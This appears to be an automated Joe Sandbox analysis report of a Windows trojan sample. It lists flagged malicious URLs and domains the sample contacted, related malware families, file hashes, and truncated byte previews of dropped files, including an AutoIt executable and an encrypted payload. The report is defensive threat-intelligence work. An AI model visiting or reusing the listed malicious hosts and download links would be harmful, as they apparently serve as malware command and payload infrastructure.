⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
2no.co	4%	Virustotal		Browse
206.23.85.13.in-addr.arpa	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://word.office.com	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://www.msn.com:443/en-us/feed	0%	URL Reputation	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	Avira URL Cloud	safe
http://cellc.org/tmp/index.php	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Avira URL Cloud	safe
https://www.pollensense.com/	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	Virustotal		Browse
https://2no.co/MR)	100%	Avira URL Cloud	malware
https://api.msn.com:443/v1/news/Feed/Windows?t	0%	Avira URL Cloud	safe
https://www.pollensense.com/	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Virustotal		Browse
https://2no.co/16G965ZC	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
http://piratia.su/tmp/index.php	100%	Avira URL Cloud	malware
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Avira URL Cloud	safe
http://cellc.org/tmp/index.php	21%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	0%	Avira URL Cloud	safe
https://powerpoint.office.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Virustotal		Browse
http://www.foreca.com	0%	Avira URL Cloud	safe
https://powerpoint.office.com	0%	Virustotal		Browse
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	0%	Avira URL Cloud	safe
https://www.autoitscript.com/autoit3/	0%	Avira URL Cloud	safe
http://piratia-life.ru/tmp/index.php	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	0%	Avira URL Cloud	safe
http://www.aimp.ru0	0%	Avira URL Cloud	safe
http://piratia.su/tmp/index.php	16%	Virustotal		Browse
http://www.foreca.com	0%	Virustotal		Browse
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	Avira URL Cloud	safe
https://www.autoitscript.com/autoit3/	0%	Virustotal		Browse
http://piratia-life.ru/tmp/index.php	16%	Virustotal		Browse
http://icebrasilpr.com/tmp/index.php	100%	Avira URL Cloud	malware
http://h-c-v.ru/tmp/index.php	100%	Avira URL Cloud	malware
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	0%	Avira URL Cloud	safe
https://2no.co/16G965	100%	Avira URL Cloud	malware
https://2no.co/hR	100%	Avira URL Cloud	malware
http://h-c-v.ru/tmp/index.php	23%	Virustotal		Browse
http://icebrasilpr.com/tmp/index.php	19%	Virustotal		Browse
https://www.msn.com/en-us/weather/topstories/accuweather-el-ni	0%	Avira URL Cloud	safe
https://2no.co/16G965	4%	Virustotal		Browse
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
2no.co	104.21.79.229	true	false	4%, Virustotal, Browse	unknown
UaTVQmthThJ.UaTVQmthThJ	unknown	unknown	true		unknown
206.23.85.13.in-addr.arpa	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cellc.org/tmp/index.php	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://piratia.su/tmp/index.php	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://piratia-life.ru/tmp/index.php	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://icebrasilpr.com/tmp/index.php	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://h-c-v.ru/tmp/index.php	true	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://2no.co/16G965	false	4%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000001C.00000000.2307149631.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000000.1277873491.0000000000839000.00000002.00000001.01000000.00000006.sdmp, Labs.pif, 0000001B.00000000.2191675925.0000000000839000.00000002.00000001.01000000.00000006.sdmp, Labs.pif.2.dr, Orders.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.pollensense.com/	explorer.exe, 0000001C.00000002.2481065121.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 0000001C.00000000.2299433125.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://2no.co/MR)	Labs.pif, 00000013.00000002.2257484669.0000000001514000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252929645.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252820608.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2no.co/16G965ZC	Labs.pif, 00000013.00000003.2252607198.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000002.2257598808.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.com	explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	lSmb6nDsrC.exe	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.foreca.com	explorer.exe, 0000001C.00000002.2481065121.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 0000001C.00000002.2483780350.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2483829342.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2482661406.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.autoitscript.com/autoit3/	lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aimp.ru0	lSmb6nDsrC.exe	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 0000001C.00000002.2484651579.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307967181.000000000913F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 0000001C.00000002.2484651579.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://2no.co/hR	Labs.pif, 00000013.00000002.2257484669.0000000001514000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252929645.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252820608.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/accuweather-el-ni	explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.79.229	2no.co	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1478963
Start date and time:	2024-07-23 09:19:46 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lSmb6nDsrC.exe renamed because original name is a hash value
Original Sample Name:	83741bbca9631aa4925203fbddc0ad7d.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@24/14@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 103 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:20:45	API Interceptor	1759x Sleep call for process: Labs.pif modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.79.229	setup.exe	Get hash	malicious	Unknown	Browse
	setup.exe	Get hash	malicious	Unknown	Browse
	Og1SeeXcB2.exe	Get hash	malicious	Remcos, Blank Grabber, PrivateLoader, SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	setup.hta	Get hash	malicious	RHADAMANTHYS	Browse
	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Blog.zip	Get hash	malicious	RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
2no.co	setup.exe	Get hash	malicious	Unknown	Browse	104.21.79.229
	setup.exe	Get hash	malicious	Unknown	Browse	104.21.79.229
	file.exe	Get hash	malicious	XenoRAT	Browse	172.67.149.76
	Og1SeeXcB2.exe	Get hash	malicious	Remcos, Blank Grabber, PrivateLoader, SmokeLoader	Browse	104.21.79.229
	file.exe	Get hash	malicious	SmokeLoader	Browse	104.21.79.229
	rpeticao_inicial.vbs	Get hash	malicious	Unknown	Browse	172.67.149.76
	setup.hta	Get hash	malicious	RHADAMANTHYS	Browse	104.21.79.229
	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse	104.21.79.229
	Blog.zip	Get hash	malicious	RHADAMANTHYS	Browse	104.21.79.229
	qG2cUr0x4A.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse	172.67.149.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	245.exe	Get hash	malicious	FormBook	Browse	172.64.41.3
	BraveBrowserSetup-BRV030.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	Sleipnir_Setup.exe	Get hash	malicious	LummaC	Browse	172.67.201.138
	http://background.apistatexperience.com/	Get hash	malicious	Unknown	Browse	104.21.71.231
	Sleipnir_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.66.66
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.27057.11598.rtf	Get hash	malicious	Remcos	Browse	104.21.52.88
	Order SMG 201906 20190816orderGMD#0498366Deta.exe	Get hash	malicious	AgentTesla, RedLine	Browse	172.67.74.152
	http://crowdstrike.black/	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	Babadeda, Stealc, Vidar	Browse	172.64.41.3
	https://www.plumbers.nz/index.php?thememode=full;redirect=https://shared-to-file.powerappsportals.com/	Get hash	malicious	HTMLPhisher	Browse	104.21.30.90

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	2024_._._._.__._-_.exe	Get hash	malicious	Unknown	Browse	104.21.79.229
	2024_._._._.__._-_.exe	Get hash	malicious	Unknown	Browse	104.21.79.229
	Tystnendes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.79.229
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.79.229
	ndplanernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.79.229
	CloudInstaller.zip	Get hash	malicious	Unknown	Browse	104.21.79.229
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	104.21.79.229
	#91139_C050.exe	Get hash	malicious	Azorult, GuLoader	Browse	104.21.79.229
	crash_fix_v_3.0.exe	Get hash	malicious	Qulab	Browse	104.21.79.229
	Ref_7021929821US20240709031221650.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.79.229

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	giupload.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exe	Get hash	malicious	Unknown	Browse
	ZUlr0Vm0Zt.pdf	Get hash	malicious	Hatef Wiper	Browse
	CrowdStrike.exe	Get hash	malicious	Hatef Wiper	Browse
	CrowdStrike.exe	Get hash	malicious	Hatef Wiper	Browse
	9YDEsXvk5V.exe	Get hash	malicious	Vidar	Browse
	S9iJqTQS7q.exe	Get hash	malicious	RedLine	Browse
	bRlvBJEl6T.exe	Get hash	malicious	Vidar	Browse
	WINWORD.exe	Get hash	malicious	NetWire	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620254876639106
Encrypted:	false
SSDEEP:	12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
MD5:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
SHA1:	F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
SHA-256:	865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
SHA-512:	57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 7% Antivirus: Virustotal, Detection: 3%, Browse
Joe Sandbox View:	Filename: giupload.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exe, Detection: malicious, Browse Filename: ZUlr0Vm0Zt.pdf, Detection: malicious, Browse Filename: CrowdStrike.exe, Detection: malicious, Browse Filename: CrowdStrike.exe, Detection: malicious, Browse Filename: 9YDEsXvk5V.exe, Detection: malicious, Browse Filename: S9iJqTQS7q.exe, Detection: malicious, Browse Filename: bRlvBJEl6T.exe, Detection: malicious, Browse Filename: WINWORD.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\s

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	248430
Entropy (8bit):	7.9994139039896295
Encrypted:	true
SSDEEP:	6144:WSeX99XQ0r/PxScf6HaUAisqIbX13nYOh+dtIyV0krz:WSebQuJRNGs1X13YAJwz
MD5:	832180873E27DA9B7A218EC02099691A
SHA1:	09A26D9AC5619DF11650BF11E41C5DD96EA371D2
SHA-256:	19E0ED3240D70F9AC0602C8507CDCB12B448D8F4AEA26F5F0A6913F9517F1A3F
SHA-512:	2ABE2FD0D9E423B75D1D49D28711402C12C20BA7A88AA0C5360DDDED3BAC92F7F07B4FCA874232E8F8C108427F3264E179A1A2F6F96F79AAB1F8F07736F92AB6
Malicious:	false
Preview:	..(...N.1..,...\ab......mC.C....FZq...@..5.C'...?.....I...;.F../>+h..y".d~...F>M.....Zp..N....B....]!6..8H..KzSW.#Pf.M....++ws...}]d.k....P.Up..R.....D.fG..d...wE....... .T..i.0$a.".$..\.$.-..z..+.._...;.".....i?./.. D.u..r.....>.+....c.(L.E..R.KI/..(.T...3......=z..."...I.M!.;....3 ..B.../z.5.......M't~.4.....gnl.:~.p^.4...f(c=.....}..!.7x..S8.KY..P....j.....z...3.N.V..E.p...5..'....L.....Tl...X.c..i5.%.........^...Hk....6./..<.`b......0...".w]S..i..F..,.3.^l../~A.....t:+X..5z.j..H.jU.......#.<.5....h.....FM....L.Z..L.ikG.h..`.E..x...:=.^2...6...lH...[ .U...S.ss;s...h....8G.....YG....g.-W)$9...b........q."...?...Qw...!.o...n...O....^Ce..FE.P...7.G...............0.F....nR......6.X....>..OW.+.......u9.....lnp..*y..L.....B..D]..Fy...I.D.f...`..N.l^].{J U:....\.)..7.Aw.a......4wZ..V...d.WMZ...u..+.K.wCr.].._...]i...p....xO.....ELth...R.#.>..F.>.!..)..B...j.e@...3.d.NCM..7.2.........>.._....:.~....O..m...m......5.n.n..,0k....o.>E4$..3..0t1.J..H.HK.

